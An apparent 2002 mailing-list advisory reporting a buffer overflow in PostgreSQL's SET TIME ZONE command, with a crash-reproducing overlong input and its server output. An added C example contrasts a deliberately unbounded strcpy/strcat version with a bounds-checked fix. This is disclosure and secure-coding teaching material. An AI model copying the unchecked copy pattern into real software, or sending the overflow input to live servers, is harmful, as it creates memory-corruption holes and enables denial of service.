@(#)Mordred Labs advisory 0x0002: Buffer overflow in PostgreSQL

From: Sir Mordred The Traitor <mordred(at)s-mail(dot)com>
To: pgsql-hackers(at)postgresql(dot)org
Subject: @(#)Mordred Labs advisory 0x0002: Buffer overflow in PostgreSQL
Date: 2002-08-21 14:45:42
Message-ID: 3d63a796.74b67121@s-mail.com
Lists: pgsql-hackers

Seems like this one was lost or was filtered out...

//@(#)Mordred Labs advisory 0x0002

Release date: 19/08/02
Name: Buffer overflow in PostgreSQL
Versions affected: all versions
Risk: high

--[ Description:
There exists a buffer overflow in the SET TIME ZONE command that
allows an attacker to execute malicious code.

--[ Details:
Upon executing the SET TIME ZONE 'STRING' command, the parse_timezone()
function is invoked, which overwrites a static buffer, tzbuf, with the
supplied string.
Look at src/backend/commands/variable.c if you need something to laugh
at.

--[ How to reproduce:
psql> SET TIMEZONE to 'XXXXXX...very long string...XXXXX'
...
NOTICE: Buffer Leak: [27191] (freeNext=0, freePrev=0, rel=0/0, blockNum=0,
flags=0x0, refcount=0 128)
NOTICE: Buffer Leak: [27192] (freeNext=0, freePrev=0, rel=0/0, blockNum=0,
flags=0x0, refcount=0 1249)
NOTICE: Buffer Leak: [27193] (freeNext=0, freePrev=0, rel=0/0, blockNum=0,
flags=0x0, refcount=0 1651799137)
NOTICE: Buffer Leak: [27194] (freeNext=0, freePrev=0, rel=0/0, blockNum=0,
flags=0x0, refcount=0 1818326649)
...
pqReadData() -- backend closed the channel unexpectedly.
This probably means the backend terminated abnormally
before or while processing the request.
The connection to the server was lost. Attempting reset: Failed.

--[ Solution:
Just wait...

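As an added example, not code from the advisory or from PostgreSQL: a hypothetical reconstruction of the pattern described above (a caller-controlled string appended without a bound to a fixed-size static buffer) next to a bounded version that rejects values that do not fit. The buffer size, the function names and the "TZ=" prefix are assumptions.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical reconstruction of the advisory's pattern, not PostgreSQL's
 * code: the SET TIME ZONE value is appended to a fixed static buffer.
 * The size and the "TZ=" prefix are assumptions. */
#define TZBUF_SIZE 64
static char tzbuf[TZBUF_SIZE];

/* Vulnerable pattern: strcpy/strcat trust the caller-controlled length.
 * A value longer than TZBUF_SIZE - 4 bytes writes past the end of tzbuf.
 * Kept here only so the two forms can be compared in review. */
void set_timezone_unchecked(const char *value)
{
    strcpy(tzbuf, "TZ=");
    strcat(tzbuf, value);
}

/* Hardened form: compute the required size first, reject anything that
 * does not fit (NUL included), and only then copy with an explicit bound.
 * Returns true if tzbuf was updated, false if the value was rejected. */
bool set_timezone_checked(const char *value)
{
    const char prefix[] = "TZ=";
    size_t plen = sizeof(prefix) - 1;
    size_t vlen = strlen(value);

    if (plen + vlen + 1 > sizeof(tzbuf))
        return false;               /* overlong value: tzbuf left untouched */

    memcpy(tzbuf, prefix, plen);
    memcpy(tzbuf + plen, value, vlen + 1);   /* +1 copies the NUL */
    return true;
}

/* Read back the current buffer contents for inspection. */
const char *current_tzbuf(void)
{
    return tzbuf;
}

int main(void)
{
    char longval[200];                       /* constructed overlong value */
    memset(longval, 'X', sizeof(longval) - 1);
    longval[sizeof(longval) - 1] = '\0';

    set_timezone_checked("PST8PDT");
    printf("accepted: %s\n", current_tzbuf());
    printf("overlong value rejected: %s\n",
           set_timezone_checked(longval) ? "no" : "yes");
    return 0;
}
```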
